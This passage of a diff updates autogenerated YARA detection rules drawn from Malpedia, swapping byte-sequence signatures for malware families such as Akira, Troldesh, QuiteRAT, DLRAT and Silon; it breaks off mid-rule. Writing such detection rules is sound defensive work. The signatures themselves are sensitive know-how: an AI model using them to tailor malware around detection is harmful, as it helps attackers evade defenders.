-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brambul_auto.yar#L1-L173"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quiterat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4ef5f993f2727cb74a42049fbc80622dc3543c88c7bb52088b1f5b1131ebc4b4"
+		logic_hash = "a310f4ac3c641f7313b25e7928a0fd6d50c428f9dd3945e05d910454f6c56057"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89490,38 +89693,32 @@ rule MALPEDIA_Win_Brambul_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 48 898d4cffffff 7413 33f6 }
-		$sequence_1 = { 8a4c0603 880c06 40 3bc7 7cf4 c6043700 }
-		$sequence_2 = { 5a d3e2 4a 8955e4 83f814 7320 6a1b }
-		$sequence_3 = { 03f5 8d8c31a1ebd96e 8b7044 8be9 c1ed1d }
-		$sequence_4 = { 50 687e660480 56 e8???????? 8b8c241c010000 6a10 }
-		$sequence_5 = { 8bfa 03f2 33fe 33f9 03fb 8bde 8dac2f22619d6d }
-		$sequence_6 = { e9???????? f6c140 0f8572040000 898db849ffff }
-		$sequence_7 = { 8975ec 895508 8975f8 8945f4 }
-		$sequence_8 = { 56 e8???????? 85c0 7e55 68???????? }
-		$sequence_9 = { 0fb600 d3e0 094508 ff45fc 3bf3 72e9 6a01 }
-		$sequence_10 = { 8b4dfc 5f 8908 8b450c }
-		$sequence_11 = { 89742424 0f8e3f010000 83fe0c 0f8636010000 668b5302 8b3d???????? 52 }
-		$sequence_12 = { ffd7 83e00f 83f803 0f8431010000 83f802 7514 668b4302 }
-		$sequence_13 = { 8bf0 81e2ff00ff00 81e6ff00ff00 33d6 33c2 }
-		$sequence_14 = { 8bf3 33ea c1ee0f c1e311 0bf3 8b5824 03f2 }
-		$sequence_15 = { f3a5 6a00 ff15???????? 83c41c 50 }
+		$sequence_0 = { ff31 8bcb ff5018 e9???????? 8b03 8bcb 8b4014 }
+		$sequence_1 = { eb31 80bef800000000 7426 8b4c2418 e8???????? 8b4c2418 6830750000 }
+		$sequence_2 = { b803000000 8d4e60 89442410 8d442434 50 8d442420 50 }
+		$sequence_3 = { f00fc11e 4b 0f95c0 84c0 0f858a030000 6a04 6a02 }
+		$sequence_4 = { c644241c01 eb05 c644241c00 f6c308 740c 8d4c2414 83e3f7 }
+		$sequence_5 = { f7f6 2b4c2418 3bc8 0f87e0000000 0fafce 03f9 33f6 }
+		$sequence_6 = { e8???????? 8d4c2410 e8???????? 8b442440 8b4c2430 64890d00000000 59 }
+		$sequence_7 = { c7460400000000 85ed 7e1c 90 8b4604 8b4e08 03c0 }
+		$sequence_8 = { e9???????? 8b06 83780400 7558 8d442434 50 e8???????? }
+		$sequence_9 = { 8b06 85c0 7415 83f8ff 7435 8bc7 f00fc106 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 5892096
 }
-rule MALPEDIA_Win_Banpolmex_Auto : FILE
+rule MALPEDIA_Win_Svcready_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e5629b9-1e18-5205-b631-ad03c2ae43f0"
+		id = "9d907139-c144-5614-a62a-7c32470debfc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banpolmex_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.svcready_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e119b8f9656fb74b42241f31ba7dcd3e79fbd082cb37077b0109e5a58aed6af5"
+		logic_hash = "d564083fd80540ab82e35300283080c4f0bdfd997ccd9dbb29372661ffd56646"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89535,32 +89732,32 @@ rule MALPEDIA_Win_Banpolmex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d15db730200 4881c128050000 e8???????? 85c0 0f8564010000 8d5019 }
-		$sequence_1 = { 48896c2420 e8???????? 488d8c2490040000 ff15???????? 85c0 7508 ff15???????? }
-		$sequence_2 = { 488d4c2430 41b001 e8???????? 85c0 7566 8b442420 3c7f }
-		$sequence_3 = { 4c8d0d45870300 4885c0 4d8bd9 4d8bd1 4c0f45d8 488b442478 498bf9 }
-		$sequence_4 = { 7525 b9d0000000 e8???????? 48898690030000 4885c0 745e 488b16 }
-		$sequence_5 = { 488d15587ffeff bf00020000 8b8c82c8820100 4803ca ffe1 80bb7403000007 731f }
-		$sequence_6 = { 894c2420 488d154df70100 488bcb e8???????? e9???????? c74424385d000000 89542430 }
-		$sequence_7 = { 7459 398360040000 7551 488d0530cf0200 483987f8020000 7522 488d05a0cf0200 }
-		$sequence_8 = { 7517 448d4004 33d2 488bcb ff15???????? 85c0 0f84d5fdffff }
-		$sequence_9 = { 89442420 e8???????? 8bd8 33ff 85db 740f 488d15f8f40100 }
+		$sequence_0 = { 33ce 33fd f7d0 c1cd03 8bd1 0bd0 }
+		$sequence_1 = { 8b400c 8b400c 8b7018 89442428 8974242c 8b4e3c 8b543178 }
+		$sequence_2 = { 33cd 33c1 a3???????? 8bc6 33c2 a3???????? 8b442410 }
+		$sequence_3 = { 58 83c23c 03d6 89542420 3bc8 7d35 83f904 }
+		$sequence_4 = { 3905???????? 0f95c0 c3 e9???????? 55 8bec 6a00 }
+		$sequence_5 = { 3315???????? 33d9 8bf2 8bcb 3335???????? 33ca 33ee }
+		$sequence_6 = { 747f 3d00010000 743e 57 56 ff7514 8d44241c }
+		$sequence_7 = { 53 8bd9 c744242000000000 56 8b08 8b4004 }
+		$sequence_8 = { 89442424 8974244c 895c2450 e8???????? 8b4c2424 c6043100 894c243c }
+		$sequence_9 = { 50 ff760c ff15???????? 6a06 8d4c2424 51 }
 
 	condition:
-		7 of them and filesize < 1555456
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Cmsbrute_Auto : FILE
+rule MALPEDIA_Win_Troldesh_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da0817c1-f424-5734-8385-f31d5907ea91"
+		id = "dfc58f44-005d-550d-86a0-6e27d1dbdd91"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cmsbrute_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.troldesh_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d6f710add367d46059e77fa037926a5f1978933090d5b5fe00daae5ae1015f3d"
+		logic_hash = "6931e846879cddb9876cefe6a37d24256d508a47e814ed459478812a95ed70dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89574,32 +89771,32 @@ rule MALPEDIA_Win_Cmsbrute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7518 6a00 6a00 ff75f0 57 56 e8???????? }
-		$sequence_1 = { eb0e 85c0 740f 6835010000 53 6a09 6a06 }
-		$sequence_2 = { ff74241c e8???????? 8b44242c 8b4018 8b00 8b10 6a00 }
-		$sequence_3 = { f742fc00040000 8b4d10 53 56 57 8bd8 7568 }
-		$sequence_4 = { eb1b 8b866c040000 8945dc 8b8670040000 8b5ddc 8945e4 8b8674040000 }
-		$sequence_5 = { ffb540ffffff 56 e8???????? 8b5718 83c40c 898558ffffff 85d2 }
-		$sequence_6 = { e9???????? 8bf3 e8???????? ff75fc ebe6 8b4704 85c0 }
-		$sequence_7 = { eb2d 3bd7 7509 397b10 0f8433ffffff 89bdf4fbffff 89b5d8fbffff }
-		$sequence_8 = { f6471801 7411 e8???????? 4b 4e e8???????? a1???????? }
-		$sequence_9 = { e9???????? f7870001000000000020 740a e8???????? e9???????? 6a32 6a02 }
+		$sequence_0 = { eb05 8945fc 33c0 3bc3 0f85cafeffff 0375fc 8b4758 }
+		$sequence_1 = { e9???????? 8b8b70040000 83f902 7d0a 68???????? e9???????? 8b8374040000 }
+		$sequence_2 = { eb64 6a48 57 ff7514 e8???????? 83c40c 6a14 }
+		$sequence_3 = { ff7508 e8???????? 83c40c 85c0 740d e8???????? 83c8ff }
+		$sequence_4 = { e8???????? 8b45f4 59 5e c9 c3 8b442408 }
+		$sequence_5 = { ff30 e8???????? 59 8b75f8 834dd8ff 85f6 7408 }
+		$sequence_6 = { e8???????? ff750c 8b5dec ff7508 8bf3 e8???????? ff750c }
+		$sequence_7 = { f6401080 7409 83bedc00000000 741a 85cf 7505 857810 }
+		$sequence_8 = { e8???????? 8b45f4 8b7004 3bf3 0f8e12010000 895de0 e8???????? }
+		$sequence_9 = { e8???????? 85ed 751e 68???????? 56 686d030000 e8???????? }
 
 	condition:
-		7 of them and filesize < 5275648
+		7 of them and filesize < 3915776
 }
-rule MALPEDIA_Win_Rekoobew_Auto : FILE
+rule MALPEDIA_Win_Sendsafe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87c5607a-8a90-598c-943e-607b112d1594"
+		id = "ca9919a1-41ee-51c0-9d8a-dc97d5d2356c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rekoobew_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sendsafe_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "aef627dbf43f3f433f140924ae4bed9b7cb42ca10d8749c65899eb3d41030244"
+		logic_hash = "0b34fbaea5b0ab525d5bd2b630928ff7f548afb642b0c0217e296f895cb417fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89613,71 +89810,71 @@ rule MALPEDIA_Win_Rekoobew_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 333cb5e07c4000 33bb14010000 89d6 c1ee10 81e6ff000000 333cb5e0744000 8b4dec }
-		$sequence_1 = { 0fb6f5 3314b5e08c4000 83c720 0fb6ca 8b348de0904000 }
-		$sequence_2 = { 83c202 c60200 5b 5e 5d c3 }
-		$sequence_3 = { 31cf 8b4de8 0fb6f5 8b0cb5e0804000 }
-		$sequence_4 = { 333495e0744000 8b4de8 0fb6d5 89f1 330c95e0784000 83c720 0fb655e4 }
-		$sequence_5 = { 31f9 034df0 89c3 c1c305 01d9 c1c71e 8b5db0 }
-		$sequence_6 = { c1c705 01fa c1c01e 8b7de4 337dec 337db8 337dbc }
-		$sequence_7 = { 0fb65005 c1e210 09f2 0fb67007 09f2 0fb67006 }
-		$sequence_8 = { 89f3 31d3 21cb 31d3 035df0 89c7 c1c705 }
-		$sequence_9 = { 89d6 8b55e8 3314b5e08c4000 8955e0 }
+		$sequence_0 = { 8b4d08 8988a8000000 8b55fc 83c244 52 ff15???????? 6a02 }
+		$sequence_1 = { c7804c03000000000000 8b4608 ff742428 8b4864 8b86c0000000 83c014 50 }
+		$sequence_2 = { ff7508 e8???????? 8b4df4 83c410 8b0c8d90945b00 89441928 8b45f0 }
+		$sequence_3 = { ebcc 8b55e8 2355bc 8b4514 8d0cd0 894de4 8b55e4 }
+		$sequence_4 = { e9???????? 8b4dec 8b11 899578ffffff 8b45ec 50 8b8d78ffffff }
+		$sequence_5 = { ff742428 e8???????? 83c414 85c0 0f842a020000 8b4c241c b801000000 }
+		$sequence_6 = { e8???????? 8b8540ffffff 8b8d44ffffff 8b9538ffffff 899481140a0000 8b8540ffffff 8b8d44ffffff }
+		$sequence_7 = { c7406cac1d5600 b807000000 e9???????? 837dfc00 742b b904000000 6bd10d }
+		$sequence_8 = { e8???????? 8bd8 83c414 84db 7912 c74424483b000000 b942020000 }
+		$sequence_9 = { 8b8de4fbffff 8b95ecfbffff 031481 8995ecfbffff e9???????? eb54 8b85e8fbffff }
 
 	condition:
-		7 of them and filesize < 248832
+		7 of them and filesize < 3743744
 }
-rule MALPEDIA_Win_Brbbot_Auto : FILE
+rule MALPEDIA_Win_Akira_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90f3eca3-a8ac-5396-b696-f6c36e242527"
+		id = "15bec9b6-593f-5024-bdc9-f9c22915c4b9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brbbot_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.akira_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "01b7f091ad5c5584725e6a754a08338f9a2c33e3759aac15777f95b901cf8ec0"
+		logic_hash = "df165485c04575afe03a18bf0b6e5a6197bfd9f8e4bf586c974ab0f67dd9d7c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 85c0 0f88f0000000 488d0d421d0100 e8???????? 8bd8 85c0 0f88da000000 }
-		$sequence_1 = { 418bd4 488bce 4c89742460 e8???????? 4c8b7540 8bd8 }
-		$sequence_2 = { 488bf8 0f85d5000000 488d0d07460000 ff15???????? 488bf0 4885c0 }
-		$sequence_3 = { 7528 48833d????????00 741e 488d0d7dde0000 e8???????? 85c0 740e }
-		$sequence_4 = { 4c895c3040 4b8b84f9c05a0100 498bd6 41b80a000000 }
-		$sequence_5 = { 752e 4b8b84f9c05a0100 8a4c303a 413ac8 741d 85db }
-		$sequence_6 = { 33d2 41b803010000 c68424f001000000 e8???????? 488d8c24e1000000 33d2 }
-		$sequence_7 = { 488bce ff15???????? 85c0 747f 035c2420 }
-		$sequence_8 = { 53 4883ec70 33db 48897010 }
-		$sequence_9 = { 33d2 897c2420 488be8 488906 ff15???????? 85c0 7506 }
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { e9???????? 488d8a58000000 e9???????? 4889542410 55 4883ec40 488bea }
+		$sequence_1 = { c1fa06 8bc2 c1e81f 03d0 6bc27f 2bc8 42888c05cb020000 }
+		$sequence_2 = { 488d4b28 e8???????? 66837b0a00 7413 bab0000000 488bcb e8???????? }
+		$sequence_3 = { f30f7f442430 33d2 488d4c2430 e8???????? 498b4f18 48394d28 0f854f010000 }
+		$sequence_4 = { e8???????? 48895f08 ba18000000 488bcf e8???????? 488d4dd8 ff15???????? }
+		$sequence_5 = { ff5020 88442430 0f57c0 0f11459f 48c745af01000000 41bf0f000000 4c897db7 }
+		$sequence_6 = { 4584ed 7444 498d5eff 488b75df 483bde 7425 e8???????? }
+		$sequence_7 = { 66660f1f840000000000 49ffc0 6642833c4000 75f5 488d9539030000 488d8de0150000 e8???????? }
+		$sequence_8 = { 41884640 41c6464101 498b0c24 48894c2430 4885c9 7445 488b5770 }
+		$sequence_9 = { 7508 c60330 48ffcb ebdf fec1 880b 483bde }
 
 	condition:
-		7 of them and filesize < 198656
+		7 of them and filesize < 1286144
 }
-rule MALPEDIA_Win_Unidentified_115_Auto : FILE
+rule MALPEDIA_Win_Smac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be30f947-2ea3-5dbe-8a22-d2eff226f388"
+		id = "6cf7aa8f-47b5-541a-9ef7-59898eb272ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_115"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_115_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smac_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "0dce5979f7403c0c98c10384045967ec938948f605faa1b9ed353ecbedbd1370"
+		logic_hash = "2551ca62dde47575d33bf5dda5cc9135e813c4132339b49d1f3c1a2ad36da540"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89691,32 +89888,32 @@ rule MALPEDIA_Win_Unidentified_115_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? b9c8af0000 e8???????? ba01000000 488d0dd4090100 e8???????? 488b05???????? }
-		$sequence_1 = { e8???????? 31c0 eb0e 803c0100 7408 48ffc0 e9???????? }
-		$sequence_2 = { 488915???????? 488905???????? 488905???????? 4c891d???????? 4c8d1deda40100 c605????????01 48c705????????00000000 }
-		$sequence_3 = { 4589c8 4521d4 01dd 41c1c802 8d1c2a 4489ca c1ca0d }
-		$sequence_4 = { 4529d8 488d541010 41ffd2 85c0 0f8490000000 486384249c000000 }
-		$sequence_5 = { 0fc8 8944240c 89442450 8b4224 897c2434 0fc8 }
-		$sequence_6 = { 7f1a 4080fe20 7e22 490fa3f6 731c 400fbed6 4889c1 }
-		$sequence_7 = { 31ff 4885c9 7403 488b39 488d5910 31f6 4531e4 }
-		$sequence_8 = { 488b0b e8???????? 488b4b08 4889442428 e8???????? 488b15???????? 488b0f }
-		$sequence_9 = { 4155 4154 57 56 53 4883ec28 31ff }
+		$sequence_0 = { 83c002 0fb708 6685c9 75df 0fafd6 8bc2 3bc3 }
+		$sequence_1 = { e8???????? 57 e8???????? 59 57 8bf8 8bc6 }
+		$sequence_2 = { 57 57 6a10 57 57 57 8d8580f1ffff }
+		$sequence_3 = { 83c002 50 57 53 e8???????? 83c410 57 }
+		$sequence_4 = { a840 7411 a900040000 740a 6a09 58 }
+		$sequence_5 = { 50 6a00 53 e8???????? 83c410 57 }
+		$sequence_6 = { 48 0f84a6010000 48 741f 6a01 }
+		$sequence_7 = { 33c0 668975b4 66894db8 668955ba 668945bc }
+		$sequence_8 = { 7320 6a01 33ff 8db514f1ffff e8???????? 6a01 8d750c }
+		$sequence_9 = { 8be5 5d c3 55 8bec 83e4f8 81eccc060000 }
 
 	condition:
-		7 of them and filesize < 648192
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Rawdoor_Auto : FILE
+rule MALPEDIA_Win_Dlrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4d5ade47-14c0-5e98-bb49-10b170788d30"
+		id = "c5494bd6-4fc0-5b83-8b92-b9ca3f87216d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rawdoor_auto.yar#L1-L155"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dlrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dlrat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "271dc4d0258aafb48e5ea172443314b54c134d84f01d29ab84a2d16da5831287"
+		logic_hash = "fad702107ce086ed634b62a81fd30395fc9fa896e743ae2abff0224916d86383"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89730,37 +89927,32 @@ rule MALPEDIA_Win_Rawdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81e2ff030000 81e1ff030000 c1e10a 0bca 81c100000100 }
-		$sequence_1 = { e8???????? 488bf8 488d4b14 488d542450 ff15???????? 440fb754245a 440fb75c2458 }
-		$sequence_2 = { ff15???????? eb09 488bd7 ff15???????? }
-		$sequence_3 = { c1e818 452bc1 88442423 8bc1 4183e03f }
-		$sequence_4 = { ff15???????? eb09 488bd3 ff15???????? b934000000 e8???????? 4889442430 }
-		$sequence_5 = { e8???????? 488bf8 48894610 4885c0 0f848e000000 488bcb e8???????? }
-		$sequence_6 = { e8???????? 488bf8 4889442430 4885ed 745f 33d2 488bcd }
-		$sequence_7 = { c1e906 894c2448 80e13f 48ffcb }
-		$sequence_8 = { 0000 0001 0100 0001 }
-		$sequence_9 = { 0101 0100 0000 0001 }
-		$sequence_10 = { 0304b540150310 59 5e eb05 }
-		$sequence_11 = { 030c8540150310 eb05 b9???????? f6410420 }
-		$sequence_12 = { 030c8540150310 eb02 8bcb f6412480 }
-		$sequence_13 = { 03048d40150310 eb05 b8???????? f640247f 7529 83faff }
-		$sequence_14 = { 030c8540150310 eb02 8bce f6412480 }
+		$sequence_0 = { e8???????? 488d0d15201100 e8???????? 4889c6 488d0526e60f00 488945b8 48c745b008000000 }
+		$sequence_1 = { eb40 be08000000 488d15ac540200 448bc6 488bcf e8???????? 85c0 }
+		$sequence_2 = { 4a8b14d1 41b8e00b0000 4e8b0c02 4c894df0 4d8b9188000000 498b4a18 488b5108 }
+		$sequence_3 = { 4c8d4e08 41b801000000 488d15a7c21500 488955b8 4c8945c0 4c894dc8 48833d????????00 }
+		$sequence_4 = { 48898528ffffff 4883bd20ffffff00 755e 8b05???????? 65488b0c2558000000 488b04c1 b9480b0000 }
+		$sequence_5 = { 4c8bcf 4531c0 ba230b0000 488d0d04260e00 e8???????? 488995e0fdffff 4c8bce }
+		$sequence_6 = { 4c8d0dec530e00 4c898d68ffffff 41ba0f000000 4c899560ffffff 4c8d8d60ffffff 488d0d8ae60e00 48898d78ffffff }
+		$sequence_7 = { 488bcb e8???????? 4889c1 e8???????? 408a7d28 4c8d4e08 41b801000000 }
+		$sequence_8 = { eb02 31c9 4c8b5510 493b8aa0000000 0f8280000000 488d0d40b71400 4883ec20 }
+		$sequence_9 = { 488955b8 48c745b008000000 4c8d45b0 488d1d6f741000 48895dc8 48c745c011000000 488d55c0 }
 
 	condition:
-		7 of them and filesize < 445440
+		7 of them and filesize < 4121600
 }
-rule MALPEDIA_Win_Ave_Maria_Auto : FILE
+rule MALPEDIA_Win_Webc2_Div_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a8ff9385-aecd-5e0a-9dbf-bb5ae67ce3ce"
+		id = "c6b6bbf1-febf-5755-a6ac-7cf5cb612b94"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ave_maria_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_div_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "059225085d94bd881b5977004829f436c6d9d9c9b3e6a06c534e4dec388c260c"
+		logic_hash = "45af776ac19cdd47801cee033d12281de26b6a70cf2be832cbeda5a468ce01ab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89774,32 +89966,32 @@ rule MALPEDIA_Win_Ave_Maria_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8165e800ff00ff c1c008 25ff00ff00 894df8 0945e8 8bc7 33c2 }
-		$sequence_1 = { 8bcf e8???????? 8d4de0 e8???????? 33f6 e9???????? e8???????? }
-		$sequence_2 = { 50 e8???????? 8d4c2424 e8???????? 46 3b770c 7293 }
-		$sequence_3 = { e8???????? 897e34 ff15???????? 5f 5e c20400 55 }
-		$sequence_4 = { 56 57 57 57 53 6801000080 ff15???????? }
-		$sequence_5 = { 85f6 742c 8b5004 2bf2 ff750c 8b08 83c2f8 }
-		$sequence_6 = { 81ce00ffffff 46 8b4df8 8a040e 88040f 47 881c0e }
-		$sequence_7 = { 50 50 8d45f8 50 8d85f0cfffff 50 53 }
-		$sequence_8 = { 8b07 5f 8b443004 5e 894304 5b 5d }
-		$sequence_9 = { 83ec18 53 8b5d08 56 57 8bf9 53 }
+		$sequence_0 = { ff15???????? 69c080ee3600 59 ebe8 }
+		$sequence_1 = { 8078056e 7512 80780663 750c 80780765 7506 }
+		$sequence_2 = { 8d7d02 83c9ff c70001000000 8d5008 33c0 f2ae f7d1 }
+		$sequence_3 = { c3 55 e8???????? 59 33c0 ebf0 81ec10020000 }
+		$sequence_4 = { 7573 80780661 756d 80780766 }
+		$sequence_5 = { 7f09 0fbed0 83ea17 89148e 8d6901 bf16000000 8bc5 }
+		$sequence_6 = { 5f e9???????? 6a3c 51 e9???????? }
+		$sequence_7 = { ff742410 eb14 817c2410808d5b00 771a 8b442414 }
+		$sequence_8 = { 83e803 bf???????? 80240100 83c9ff 33c0 f2ae f7d1 }
+		$sequence_9 = { 8b048e 8d1c9510114000 8b17 2bc2 99 }
 
 	condition:
-		7 of them and filesize < 237568
+		7 of them and filesize < 32768
 }
-rule MALPEDIA_Win_Blacklotus_Auto : FILE
+rule MALPEDIA_Win_Silon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "84ef9a0b-6544-5450-8b66-292ec2ba5dbd"
+		id = "79ca4e66-80c4-54d1-ad2d-bb8c124436f4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blacklotus_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.silon_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "94ccc2d7ff61cb6463b78893aadb2549c584433629bcbab33ca8298790f40cde"
+		logic_hash = "874421a098d05c259305f60b2d95c6c3b7ec16195697a960df4680d8169470c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89813,32 +90005,32 @@ rule MALPEDIA_Win_Blacklotus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 443bca 7319 69c03f000100 4883c102 4103c0 41ffc1 440fb701 }
-		$sequence_1 = { c745cfc1afbd03 c745d301138a6b c745d73a911141 c745db4f67dcea c745df97f2cfce }
-		$sequence_2 = { 448bc6 488d155b1d0000 488bcb e8???????? 488bf0 }
-		$sequence_3 = { 770b 418b4908 03ca 413bcb 770e 6641ffc2 4983c128 }
-		$sequence_4 = { 42883c10 4183fb3c 0f8c45ffffff 498d8af0000000 41b810000000 498bd6 }
-		$sequence_5 = { 488d1588f7ffff e8???????? 488b05???????? 488bcb ff5020 488b5c2430 488b742438 }
-		$sequence_6 = { 4632440c30 eb1b 418af1 83f804 }
-		$sequence_7 = { 4889442428 4c8bc5 488bd3 48897c2420 }
-		$sequence_8 = { 740b 4883c602 483bf7 72bd eb0c bb03000000 eb05 }
-		$sequence_9 = { 48897010 48897818 4c897020 55 488d68c8 4881ec30010000 4c8bd1 }
+		$sequence_0 = { 6a03 68???????? 8b5508 8b4204 50 }
+		$sequence_1 = { 83c114 898d00efffff 8b9500efffff 0fb6420d }
+		$sequence_2 = { 83ec14 c745ec00000000 c745fc00000000 6804010000 68???????? }
+		$sequence_3 = { 7418 8b5508 8b8264080000 8b4d08 8b9160080000 899060080000 8b4508 }
+		$sequence_4 = { 0f8512010000 8b85ecfeffff 83c001 8985e4feffff }
+		$sequence_5 = { 8985c4fdffff 8b8dc4fdffff 51 e8???????? }
